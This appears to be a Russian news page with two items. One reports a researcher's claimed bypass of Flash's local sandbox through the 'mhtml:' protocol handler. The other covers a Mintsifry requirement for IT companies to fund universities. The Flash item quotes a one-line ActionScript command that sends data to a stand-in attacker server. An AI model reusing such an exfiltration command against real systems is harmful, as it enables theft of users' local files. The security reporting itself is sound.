Простой способ обхода «песочницы» Flash

Простой способ обхода «песочницы» Flash

Был найден специалистом в области безопасности. Он утверждает, что даже если файл был запущен локально, то для злоумышленника отправить его на удаленный сервер не составит труда.

Как известно, компания Adobe в своей продукции предусмотрела некоторые меры по защите доступа к сети. Одной из мер является встроенная в приложение «песочница», посредством которой осуществляется контроль доступа к сети через черный список. В этот список включены заголовки протоколов, например HTTP и HTTPS.

Однако, исследователь в области безопасности Билли Риос, утверждает, что можно отправлять файлы на сервер, используя в заголовках запись «file:», но в этом случае данные будут гулять по локальной сети. А для отправки данных на удаленный сервер, по его мнению, вполне подойдет заголовок – mhtml.

Этот заголовок по умолчанию поддерживается в операционных системах семейства Windows, и поэтому данные могут быть отправлены при помощи ActionScript команды: «getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);». Стоит заметить, что для подтверждения своей гипотезы специалист не привел никаких демонстрационных материалов.

Конечно, удивительно, что настолько легко и просто можно обойти одну из «песочниц»
Flash. Однако, это открытие не представляет серьезной опасности, поскольку вряд ли пользователи будут специально скачивать себе на компьютер SWF файл, чтобы просмотреть через плеер. Обычно, такие файлы просматриваются в обозревателе, где предусмотрен иной набор правил.

Инициатива Минцифры по помощи вузам рискует снизить инвестиции ИТ-компаний

По оценкам участников отрасли, требование Минцифры направлять вузам 3% от средств, сэкономленных за счёт налоговых льгот, может привести к сокращению инвестиций ИТ-компаний в образование и науку на 30–50%. Представители рынка считают, что предложенный министерством механизм сужает круг возможных направлений для поддержки и тем самым снижает вклад бизнеса в формирование кадрового резерва отрасли.

Это требование Минцифры появилось в декабре 2025 года. К июню компании со штатом более 100 человек и выручкой свыше 1 млрд рублей должны будут заключить соглашения с профильными вузами о финансовой поддержке и содействии в подготовке кадров.

В феврале 2026 года был опубликован проект приказа Минцифры, определяющий порядок взаимодействия ИТ-компаний и вузов. В частности, как пишет «Коммерсантъ», участникам рынка предлагается разрабатывать проекты основных образовательных программ, привлекать сотрудников компаний к преподаванию, а также финансировать стажировки, создание контента для школ, программы повышения квалификации и мероприятия в рамках федеральных проектов.

В марте на проект поступили отзывы от ИТ-компаний и профильных объединений. Так, Ассоциация разработчиков программных продуктов (АРПП) «Отечественный софт» и Российский союз промышленников и предпринимателей заявили, что документ «существенно ограничивает виды поддержки и не в полной мере учитывает интересы сторон». В числе возможных последствий они назвали сокращение текущих расходов компаний на образование и науку на 30–50%, а также сужение перечня образовательных инициатив, которые сможет поддерживать бизнес.

Отраслевые объединения предлагают расширить список допустимых мер поддержки. Среди возможных вариантов — именные стипендии и гранты, организация и проведение хакатонов, передача лицензий на программное обеспечение и оборудования, а также освобождение от НДС всех операций по передаче средств от ИТ-компаний образовательным учреждениям.

Как отметил источник издания на ИТ-рынке, вопрос поддержки образования остаётся для отрасли крайне важным, особенно для крупных компаний. Это связано в том числе с действующими налоговыми и неналоговыми льготами, однако у бизнеса по-прежнему остаётся немало вопросов о том, как учитывать такие расходы.

В Минцифры, в свою очередь, заявили, что включили в проект приказа те меры, которые, по оценке ведомства, дают наибольший эффект. При этом в министерстве добавили, что «вопрос расширения перечня видов мероприятий может быть рассмотрен в дальнейшем».

«Эксперты АРПП проанализировали опыт реализации пилотного проекта, посвящённого взаимодействию ИТ-компаний и образовательных организаций, и сформулировали предложения по доработке инициативы. На рабочей встрече в Минцифры эти предложения были рассмотрены. Сейчас мы ведём совместную работу по совершенствованию проекта», — рассказал исполнительный директор АРПП «Отечественный софт» Ренат Лашин.

RSS: Новости на портале Anti-Malware.ru